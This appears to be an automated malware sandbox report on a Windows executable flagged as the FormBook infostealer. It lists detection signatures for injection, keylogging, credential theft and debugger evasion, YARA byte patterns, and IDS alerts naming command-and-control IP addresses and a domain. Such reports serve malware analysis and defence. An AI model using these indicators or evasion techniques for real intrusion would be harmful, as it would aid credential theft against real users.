
Windows Analysis Report
H1CYDJ8LQe.exe

Overview

General Information

Sample name: H1CYDJ8LQe.exe
renamed because original name is a hash value
Original sample name: ff969b79ea4daf4a820a4c21a8d1f8e66d25290902e2e9f131a4a88bb8f5def3.exe
Analysis ID: 1549376
MD5: 8afeae6ec5433e3f0c6903fc107fa851
SHA1: 3e0ed7af55e709fa0bb5c744f59bd94a8f8ab2bf
SHA256: ff969b79ea4daf4a820a4c21a8d1f8e66d25290902e2e9f131a4a88bb8f5def3
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • H1CYDJ8LQe.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\H1CYDJ8LQe.exe" MD5: 8AFEAE6EC5433E3F0C6903FC107FA851)
    • svchost.exe (PID: 6016 cmdline: "C:\Users\user\Desktop\H1CYDJ8LQe.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • SwTeWVAxKdsP.exe (PID: 2020 cmdline: "C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • dvdplay.exe (PID: 3592 cmdline: "C:\Windows\SysWOW64\dvdplay.exe" MD5: D388610A1DE600E01277AECF3B1280A3)
          • SwTeWVAxKdsP.exe (PID: 2816 cmdline: "C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3140 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps

Source | Rule | Description | Author | Strings
00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c180:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1411f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c180:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1411f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Yara matches in unpacked PE files

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e703:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x166a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f503:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x174a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Sigma: Uncommon Svchost Parent Process

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", CommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", ParentImage: C:\Users\user\Desktop\H1CYDJ8LQe.exe, ParentProcessId: 7096, ParentProcessName: H1CYDJ8LQe.exe, ProcessCommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", ProcessId: 6016, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", CommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", ParentImage: C:\Users\user\Desktop\H1CYDJ8LQe.exe, ParentProcessId: 7096, ParentProcessName: H1CYDJ8LQe.exe, ProcessCommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", ProcessId: 6016, ProcessName: svchost.exe

Suricata alerts, SID 2022930

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T15:42:07.835082+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-05T15:42:47.759944+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49741 | TCP

Suricata alerts, SID 2855465

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T15:42:24.713888+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 3.33.130.190 | 80 | TCP
2024-11-05T15:42:48.266162+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:03.246847+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49814 | 213.249.67.10 | 80 | TCP
2024-11-05T15:43:31.948296+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49900 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:45.254236+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50019 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:58.817264+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50023 | 161.97.142.144 | 80 | TCP
2024-11-05T15:44:12.934203+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50027 | 8.217.17.192 | 80 | TCP
2024-11-05T15:44:27.387334+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50031 | 78.141.202.204 | 80 | TCP
2024-11-05T15:44:41.510743+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50035 | 184.94.215.26 | 80 | TCP

Suricata alerts, SID 2855464

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T15:42:40.580377+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 3.33.130.190 | 80 | TCP
2024-11-05T15:42:44.059393+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 3.33.130.190 | 80 | TCP
2024-11-05T15:42:46.606255+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 3.33.130.190 | 80 | TCP
2024-11-05T15:42:54.246835+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49772 | 213.249.67.10 | 80 | TCP
2024-11-05T15:42:57.137402+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49783 | 213.249.67.10 | 80 | TCP
2024-11-05T15:42:59.653067+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49798 | 213.249.67.10 | 80 | TCP
2024-11-05T15:43:09.074514+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49854 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:12.512491+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49870 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:15.060401+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49884 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:38.496790+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:40.155976+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50017 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:42.721431+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50018 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:51.189788+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50020 | 161.97.142.144 | 80 | TCP
2024-11-05T15:43:53.720367+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50021 | 161.97.142.144 | 80 | TCP
2024-11-05T15:43:56.255680+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50022 | 161.97.142.144 | 80 | TCP
2024-11-05T15:44:05.012335+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50024 | 8.217.17.192 | 80 | TCP
2024-11-05T15:44:07.824897+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50025 | 8.217.17.192 | 80 | TCP
2024-11-05T15:44:10.344137+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50026 | 8.217.17.192 | 80 | TCP
2024-11-05T15:44:19.746712+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50028 | 78.141.202.204 | 80 | TCP
2024-11-05T15:44:22.327458+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50029 | 78.141.202.204 | 80 | TCP
2024-11-05T15:44:24.856082+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50030 | 78.141.202.204 | 80 | TCP
2024-11-05T15:44:33.583073+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50032 | 184.94.215.26 | 80 | TCP
2024-11-05T15:44:36.379438+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50033 | 184.94.215.26 | 80 | TCP
2024-11-05T15:44:38.988721+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50034 | 184.94.215.26 | 80 | TCP
2024-11-05T15:44:48.065467+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50036 | 3.33.130.190 | 80 | TCP
2024-11-05T15:44:50.599779+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50037 | 3.33.130.190 | 80 | TCP
2024-11-05T15:44:53.173155+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50038 | 3.33.130.190 | 80 | TCP


            AV Detection

Source: H1CYDJ8LQe.exe | ReversingLabs: Detection: 39%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: H1CYDJ8LQe.exe | Joe Sandbox ML: detected
Source: H1CYDJ8LQe.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: dvdplay.pdbGCTL source: svchost.exe, 00000001.00000002.1862870444.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1862889809.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000002.3526788832.0000000001398000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SwTeWVAxKdsP.exe, 00000002.00000000.1764960932.00000000004BE000.00000002.00000001.01000000.00000004.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3526375024.00000000004BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: H1CYDJ8LQe.exe, 00000000.00000003.1678980011.0000000004710000.00000004.00001000.00020000.00000000.sdmp, H1CYDJ8LQe.exe, 00000000.00000003.1678801980.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750211424.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1748581643.0000000003000000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1866640503.00000000031F8000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1869028004.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.0000000003560000.00000040.00001000.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.00000000036FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: H1CYDJ8LQe.exe, 00000000.00000003.1678980011.0000000004710000.00000004.00001000.00020000.00000000.sdmp, H1CYDJ8LQe.exe, 00000000.00000003.1678801980.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1863300462.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750211424.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1748581643.0000000003000000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, dvdplay.exe, 00000003.00000003.1866640503.00000000031F8000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1869028004.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.0000000003560000.00000040.00001000.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.00000000036FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dvdplay.pdb source: svchost.exe, 00000001.00000002.1862870444.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1862889809.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000002.3526788832.0000000001398000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: dvdplay.exe, 00000003.00000002.3526191845.00000000030FD000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527827023.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942597721.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2163541700.000000001D2EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: dvdplay.exe, 00000003.00000002.3526191845.00000000030FD000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527827023.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942597721.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2163541700.000000001D2EC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_00B3C580 FindFirstFileW,FindNextFileW,FindClose, 3_2_00B3C580
Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 4x nop then xor eax, eax | 3_2_00B29AF0
Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 4x nop then pop edi | 3_2_00B426B8
Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_033B04E7

            Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49783 -> 213.249.67.10:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 213.249.67.10:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49798 -> 213.249.67.10:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49870 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49742 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49854 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49814 -> 213.249.67.10:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49900 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50019 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 8.217.17.192:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 8.217.17.192:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 78.141.202.204:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 8.217.17.192:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 78.141.202.204:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 78.141.202.204:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 8.217.17.192:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 78.141.202.204:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 184.94.215.26:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 184.94.215.26:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 184.94.215.26:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 184.94.215.26:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 161.97.142.144:80
Source: DNS query: www.030002832.xyz
Source: Joe Sandbox View | IP Address: 161.97.142.144 161.97.142.144
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View | ASN Name: METAREGISTRARNL METAREGISTRARNL
Source: Joe Sandbox View | ASN Name: CONTABODE CONTABODE
Source: Joe Sandbox View | ASN Name: VXCHNGE-NC01US VXCHNGE-NC01US
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49730
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49741
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile, 0_2_004422FE
